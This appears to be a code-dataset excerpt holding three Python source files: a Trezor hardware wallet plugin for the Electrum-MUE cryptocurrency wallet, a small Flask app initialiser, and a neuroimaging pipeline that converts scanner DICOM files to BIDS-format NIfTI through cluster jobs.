source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
trezor.py | import traceback
import sys
from typing import NamedTuple, Any
from electrum_mue.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_mue.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_mue.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_mue import constants
from electrum_mue.i18n import _
from electrum_mue.plugin import Device
from electrum_mue.transaction import deserialize, Transaction
from electrum_mue.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_mue.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_mue.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
libraries_URL = 'https://github.com/trezor/python-trezor'
minimum_firmware = (1, 5, 2)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "MonetaryUnit"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx: Transaction):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if info.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
__init__.py | from flask import Flask
from config import DevConfig, ProdConfig
import threading
app = Flask(__name__)
app.config.from_object(DevConfig)
from app import routes, control, mock
# Start the control thread if it isn't running
if "ControlThread" not in [thread.name for thread in threading.enumerate()]:
controlthread = threading.Thread(target=control.controlworker, name="ControlThread", daemon=True)
controlthread.start()
|
inc_dcm2bids.py | #! usr/bin/env python
# ## PIPELINE: inc_dcm2bids.py
# ## USAGE: python3 inc_dcm2bids --template=<templatefile> --trange=<days> [OPTIONS]
# * requires python3, freesurfer, FSL (calls FSL via python subprocess)
#
# ## Author(s)
#
# * Amy K. Hegarty, Intermountain Neuroimaging Consortium, University of Colorado Boulder
# * University of Colorado Boulder
#
# ## Product
#
# FSL Pipelines
#
# ## License
#
# <!-- References -->
# [FSL]: https://fsl.fmrib.ox.ac.uk/fsl/fslwiki
# [pybids]: Yarkoni et al., (2019). PyBIDS: Python tools for BIDS datasets. Journal of Open Source Software, 4(40), 1294, https://doi.org/10.21105/joss.01294
# Yarkoni, Tal, Markiewicz, Christopher J., de la Vega, Alejandro, Gorgolewski, Krzysztof J., Halchenko, Yaroslav O., Salo, Taylor, ? Blair, Ross. (2019, August 8). bids-standard/pybids: 0.9.3 (Version 0.9.3). Zenodo. http://doi.org/10.5281/zenodo.3363985
#
import os, sys, getopt, glob, re, bids, json, warnings, subprocess, multiprocessing
from subprocess import PIPE
from os import path
import pandas as pd
import os.path, time
import datetime as dt
from pathlib import Path
import collections
import smtplib, ssl
# ------------------------------------------------------------------------------
# Show usage information for this script
# ------------------------------------------------------------------------------
def print_help():
print("""
Intermountain Neuroimaging Consortium Dicom 2 BIDS conversion
Usage: """ + """ --template=<bids-template> --trange=<days> [OPTIONS]
OPTIONS
-h --help show this usage information and exit
-i --template [JSON] study template describing naming convention
-t --trange time range (days) for dicom retreival (range starts today)
-c --nifti-convert (default false) run conversion to nifti for
scanner dicoms. Output in bids format
-l --subject-id-key provide a key for M803 number and subject ids (overrides accession #)
format: (csv) column 1: run(1)/skip(0)
column 2: dicom path (USRI/Study date and time
column 3: subject id
column 4: (optional) session id
-w --suppress-warnings (default false) suppress warings on terminal
** OpenMP used for parellelized execution of XXX. Multiple cores (CPUs)
are recommended (XX cpus for each fmri scan).
** see github repository for more information and to report issues:
https://github.com/intermountainneuroimaging/dcm2bids.git
""")
# ------------------------------------------------------------------------------
# Parse arguements for this script
# ------------------------------------------------------------------------------
def parse_arguments(argv):
#intialize arguements
print("\nParsing User Inputs...")
runconvert = False
warns = False
pidkey = ""
wd=os.popen('echo $HOME/scratch').read().rstrip()
try:
opts, args = getopt.getopt(argv,"hi:t:l:cw",["template=","trange=","help","nifti-convert","subject-id-key=","suppress-warnings"])
except getopt.GetoptError:
print_help()
sys.exit(2)
for opt, arg in opts:
if opt in ("-h", "--help"):
print_help()
sys.exit()
elif opt in ("-i", "--template"):
bidstemplate = arg
if not os.path.exists(bidstemplate):
raise Exception("BIDS study template does not exist")
elif opt in ("-t", "--trange"):
trange = arg
elif opt in ("-c","--nifti-convert"):
runconvert = True
elif opt in ("-l","--subject-id-key"):
pidkey = arg
elif opt in ("-w","--suppress-warnings"):
warns = True
if 'bidstemplate' not in locals():
print_help()
raise Exception("Missing required argument -i [--template]")
sys.exit()
if 'trange' not in locals():
print_help()
raise Exception("Missing required argument -t [--trange]")
sys.exit()
class args:
def __init__(self, wd, bidstemplate, trange, runconvert,warns,pidkey):
self.wd = wd
self.bidstemplate = bidstemplate
self.trange = trange
self.runconvert = runconvert
self.suppresswarnings = warns
self.pidkey = pidkey
self.templates = "/projects/amhe4269/banichlab_ldrc_preproc/inc_resources/scanner_check/v2.0/"
entry = args(wd, bidstemplate, trange, runconvert,warns,pidkey)
return entry
# # ------------------------------------------------------------------------------
# # Main Pipeline Starts Here...
# # ------------------------------------------------------------------------------
def worker(name,cmdfile):
"""Executes the bash script"""
process = subprocess.Popen(cmdfile.split(), stdout=PIPE, stderr=PIPE, universal_newlines=True)
output, error = process.communicate()
print(output)
print(error)
print("worker: " + name + " finished")
return
# define functions
def list_diff(list1, list2):
return (list(set(list1) - set(list2)))
def last_4chars(x):
return(x[-4:])
# load study heuristic file...
def heuristic(entry):
# load study template
with open(entry.bidstemplate) as f:
data = json.load(f)
# get study specifics from heuristic file
heuristic.studyname=data['Acquisition'][0]['Study'][0]['name']
heuristic.scannerpath=data['Acquisition'][0]['Study'][0]['scanner_regexp']
# check bids path if defined
if 'bids' in data['Acquisition'][0]['Study'][0]:
heuristic.bidspath=data['Acquisition'][0]['Study'][0]['bids']
if heuristic.bidspath != "":
#check bids directory exists...
if not path.exists(heuristic.bidspath):
raise Exception([heuristic.bidspath + " does not exist!"] )
else:
bidspath=[]
# get regular expressions for T1w for ascension command
heuristic.subregexp=data['Acquisition'][0]['Subject'][0]['scanner_regexp']
heuristic.sesregexp=data['Acquisition'][0]['Session'][0]['scanner_regexp']
heuristic.t1wregexp=data['Acquisition'][0]['anat'][0]['scanner_regexp']
# check scanner path exists...
if not path.exists(heuristic.scannerpath):
raise Exception([heuristic.scannerpath + " does not exist!"] )
heuristic.strexp=heuristic.scannerpath + '/' + heuristic.subregexp + '/' + heuristic.sesregexp + '/' + heuristic.t1wregexp + '_????/*0001-1.dcm'
heuristic.data=data
def get_pidkey(entry):
if entry.pidkey:
key=pd.read_csv(entry.pidkey, header=None)
print("Using Key:")
print(key)
key.drop(key[key[0] == 0].index, inplace = True)
else:
key=pd.DataFrame()
return key
# Get Subject / Session Set
def new_scans(entry):
# check time ids for all recent file transfers - if within time domain report...
today = dt.datetime.now().date()
start_date = today - dt.timedelta(days=int(entry.trange))
print("Searching for DICOMS: " + start_date.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d") + "... ")
# pull all recent files...
flag_newscan = False
alltxt=""
key = get_pidkey(entry)
#add entry to log
bidspath = heuristic.data['Acquisition'][0]['Study'][0]['bids']
f = open(bidspath+"/tmp/dcm2bids.key", "a")
f.write("Entry: "+today.strftime("%m/%d/%Y, %H:%M:%S")+"\n")
f.close()
files=subprocess.check_output("cd "+heuristic.scannerpath+"; find M803*/Study* -maxdepth 0 -mtime -"+entry.trange,shell=True)
files = files.decode().strip().split('\n')
if files[0]:
for f in files:
if 'layout' not in locals():
layout = make_bidsobject(bidspath)
# ppath = s.join(fpath)
ppath=heuristic.scannerpath+"/"+f
print("\nAcquisition...")
print(ppath)
print(" ")
study = heuristic.data['Acquisition'][0]['Study'][0]['name']
subdigit = heuristic.data['Acquisition'][0]['Subject'][0]['digits']
sesdigit = heuristic.data['Acquisition'][0]['Session'][0]['digits']
scannerID=ppath.split('/')[-2]
s="/"
scannertimedate=s.join(ppath.split('/')[-2:])
filetime = dt.datetime.fromtimestamp(os.path.getmtime(ppath))
scandate=filetime.date().strftime("%Y-%m-%d")
if key.empty:
filepath=ppath + '/' + heuristic.t1wregexp + '_????/*0001-1.dcm'
dicomfile=subprocess.check_output("ls "+filepath,shell=True)
dicomfile=dicomfile.decode().strip().split('\n')
print("Pulling Subject ID from DICOM accession...")
process = subprocess.Popen(['./accession.sh',dicomfile[0]], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = process.communicate()
out = out.strip('\n')
print(err)
out = out.replace('rray','') # special rule for rray study...
out = out.replace('cbd','') # special rule for cbdx study...
out = out.replace('cwb','') # special rule for cwb study...
if '/' in out:
pid = out.split('/')[1].zfill(subdigit) # pull subject ID from accession number
if len(out.split('/')) > 2:
ses = out.split('/')[2] # pull session ID from accession number
ses = ses.strip('s').strip('S').zfill(sesdigit)
else:
ses = "none"
else:
pid = out
ses = "none"
if not pid: # if pid is empty (issue with accession)
pid="unknown"
else:
index = key.index[key[1] == scannertimedate].tolist()
print(index)
if not index:
continue
pid = str(key.loc[index[0],2])
if len(key.columns) > 3:
ses = key[3][index[0]]
else:
ses = "none"
print("Running for sub-" + str(pid) + " ses-" + str(ses))
ff = open(bidspath+"/tmp/dcm2bids.key", "a")
ff.write("Convert sub-" + str(pid) + " ses-" + str(ses)+"\n")
ff.close()
# match image with template info
new_aquisitions = make_bidsname(entry,ppath,pid,ses,heuristic.data,layout)
# convert new aquisitions to nifit
nifti_convert(entry,new_aquisitions,heuristic.data)
# generate report text
rptext = make_textreport(study,scannertimedate,pid,ses,scandate)
print(rptext)
# add to summary scanner email (for all studies)
if not os.path.exists("email.txt"):
fo=open("email.txt","w+")
fo.write("Subject: " + "[inc_scanner_report] " + "Scanner Check : date range " + str(start_date) + " to " + str(today) + "\n\n" )
fo.close()
fo = open('email.txt', 'a')
fo.write(rptext + "\n\n")
# Close the file
fo.close()
alltxt=alltxt+rptext + "\n\n"
flag_newscan = True
if not flag_newscan:
print("No aquisitions in selected time range")
if flag_newscan:
sendemail(alltxt,heuristic.data,entry)
# END new_scans
def make_bidsobject(bidspath):
if not os.path.exists(bidspath) or not os.path.exists(bidspath +'/' + 'dataset_description.json'):
os.makedirs(bidspath,exist_ok=True)
# make dataset_description file...
data = {
'Name': 'Intermountain Neuroimaging Consortium Dataset',
"BIDSVersion": "1.1.1",
"CodeURL": "",
"HowToAcknowledge": ""}
with open(bidspath + '/' + 'dataset_description.json', 'w') as outfile:
json.dump(data, outfile, indent=2)
print("\n...Loading BIDS Object \n")
bids.config.set_option('extension_initial_dot', True)
layout = bids.BIDSLayout(bidspath, derivatives=False, absolute_paths=True)
return layout
# END make_bidsobject
def make_bidsname(entry,filepath,pid,ses,data,layout):
# loop through all possible scanner images to convert (e.g. anat, func, dwi, ...)
imgtype = ['anat', 'func', 'dwi', 'fmap']
acq_list = [['dicomdir'],['bidsfile']]
for t in imgtype:
# all images of type t
if t not in data['Acquisition'][0]:
continue
modalimgs=data['Acquisition'][0][t]
# all images of imgtype "t" (e.g. loop through all func images)
for img in modalimgs:
name = img['name']
scanner_regexp = img['scanner_regexp']
input_regexp = filepath + '/' + scanner_regexp + '_????'
directories = glob.glob(input_regexp)
if 'nAcquisitions' in img:
nruns = int(img['nAcquisitions'])
else:
nruns = 1
# error checking here
dcm_errorcheck(directories,img,t,nruns) # check for errors in dicom set based on study template
# return misstext, dupltext, incompltext for report...
# Fix any issues...
if len(directories) > nruns:
directories.sort(key=os.path.getctime)
directories = directories[-nruns:] # if too many runs are logged, use the most recently collected set
# raise Exception("Number of matching aquisitions exceeds expected scans")
elif len(directories) < nruns:
if not entry.suppresswarnings:
print("**** \n\nNumber of matching aquisitions is less than expected scans:\n" + input_regexp + "\n Expected: "+ str(nruns) + " ... Found: " + str(len(directories)) + "\n\n***")
warnings.warn("**** \n\nNumber of matching aquisitions is less than expected scans\n\n***")
directories = sorted(directories, key = last_4chars)
# get match dicom name to bids name
r=1
for inputdir in directories:
# Define the pattern to build out bids file structure
pattern = data['Acquisition'][0]['Study'][0]['bids_pattern']
# pattern = "sub-{subject}/[ses-{session}/][{type}/]sub-{subject}[_ses-{session}][_task-{task}][_acq-{acquisition}][_rec-{reconstruction}][_run-{run}][_echo-{echo}][_dir-{direction}][_space-{space}][_desc-{desc}]_{suffix}.nii.gz",
# Populate values for pattern
ent = img.copy() # pull pattern values directly from json file... (e.g. task, aquisition, suffix)
ent['subject'] = pid
if ses != "none":
ent['session'] = ses
else:
ent['session'] = []
ent['type'] = t
if "run" in img:
if img["run"] == "n":
ent['run'] = str(r).zfill(2)
r = r + 1
bidsfile = layout.build_path(ent, pattern, validate=False, absolute_paths=False)
dicomdir = inputdir
acq_list[0].append(dicomdir) # all the dicom file paths
acq_list[1].append(bidsfile) # all the bids filenames
return acq_list
# END make_bidsname
def nifti_convert(entry,acq_list,data):
warningstxt=""
if not hasattr(nifti_convert,"warnings"):
nifti_convert.warnings = "Warnings: "
# check to make sure dicom list and bids list is the same length
if len(acq_list[0]) != len(acq_list[1]):
raise Exception("Issue with matching DICOM and BIDS format: Contact support team")
studyname = data['Acquisition'][0]['Study'][0]['name']
bidspath = data['Acquisition'][0]['Study'][0]['bids']
r=1
jobs=[];
for i in range(1,len(acq_list[0])):
dicomdir = acq_list[0][i]
bidsfile = acq_list[1][i].replace(".nii.gz","")
bidsname=bidsfile.split("/")[-1]
# print(dicomdir + " to " + bidsfile)
# check if output file already exists
if os.path.exists(bidspath + '/' + bidsfile + ".nii.gz"):
print("Warning: " + bidsfile + ".nii.gz" + " already exists")
warningstxt=warningstxt + "\n" + bidsfile + ".nii.gz" + " already exists"
continue
# print list of aqusition + bids names
s="/"
dicomname=dicomdir.split("/")
dicomname=s.join(dicomname[-3:])
f = open(bidspath+"/tmp/dcm2bids.key", "a")
f.write(dicomname + "\t" + bidsname +"\n")
f.close()
#check if nifti conversion should run
if not entry.runconvert:
continue
# run dcm2niix on cluster...
# call worker...
# run dicom converter - pass output to bids directory
subiden = [i for i in bidsname.split("_") if "sub" in i]
sesiden = [i for i in bidsname.split("_") if "ses" in i]
pid = subiden[0].split("-")[1]
if sesiden:
ses = sesiden[0].split("-")[1]
else:
ses=""
imgdir=bidspath + "/tmp/data/bimages/" + pid + "/" + ses + "/Nifti"
os.makedirs(imgdir, exist_ok=True)
# prd_name=Path(dicomdir).stem[:-5]
dicomname=dicomdir.split("/")
prd_name=dicomname[-1]
niftiimg = imgdir + '/' + prd_name
print('Running:' + bidsfile + '.nii.gz')
# add session paths
cmdfile = imgdir + '/run_dcm2niix_' + str(r).zfill(2)
cmd='cp ' + entry.templates + 'run_dcm2niix.sh ' + cmdfile
subprocess.run(cmd.split())
cmd='chmod u+x ' + cmdfile
subprocess.run(cmd.split())
sed1=('s^DICOM_PLACEHOLDER^' + dicomdir + '^')
sed2=('s^BIDSFILE_PLACEHOLDER^' + bidspath + '/' + bidsfile + '^')
sed3=('s^NIFTI_PLACEHOLDER^' + niftiimg + '^')
subprocess.run(['sed','-i',sed1,cmdfile])
subprocess.run(['sed','-i',sed2,cmdfile])
subprocess.run(['sed','-i',sed3,cmdfile])
# run script
slurm_outfile=imgdir+"/dcm2niix.o%j"
slurm_errfile=imgdir+"/dcm2niix.e%j"
sbatchflags = "-q preemptable -p blanca-ccn -A blanca-ics-" + studyname + " -c 2 --job-name dcm2niix --wait --time=04:00:00 --mem=16G -o " + slurm_outfile + " -e " + slurm_errfile
cmd = 'sbatch ' + sbatchflags + ' ' + cmdfile
name = "dcm2niix-" + str(r).zfill(2)
p = multiprocessing.Process(target=worker, args=(name,cmd))
jobs.append(p)
p.start()
r = r+1
print(p)
for job in jobs:
job.join() #wait for all distcorrepi commands to finish
nifti_convert.warnings = nifti_convert.warnings + warningstxt
# add intended for section in fieldmaps
if entry.runconvert:
intendedfor(acq_list,bidspath)
# END nifti_convert
def intendedfor(acq_list,bidspath):
# add intended for section in fmap json files...
funcfiles = [i for i in acq_list[1] if "func/" in i]
dwifiles = [i for i in acq_list[1] if "dwi/" in i]
fmapfiles = [i for i in acq_list[1] if "fmap/" in i]
intendedfor_list = funcfiles + dwifiles
sep='/'
for i in range(0,len(intendedfor_list)):
file=intendedfor_list[i].split('/')
intendedfor_list[i]=sep.join(file[-2:])
if fmapfiles: # if convert list includes fmaps
import time
time.sleep(120) #sleep 30 seconds to make sure file shows up in new location
for i in fmapfiles:
i = i.replace(".nii.gz", ".json")
with open(bidspath + '/' + i) as f:
data = json.load(f)
y={"IntendedFor":intendedfor_list}
data.update(y)
dat = collections.OrderedDict(data)
dat.move_to_end('IntendedFor',last=True)
data=dict(dat)
with open(bidspath + '/' + i, 'w') as outfile:
json.dump(data, outfile, indent=2)
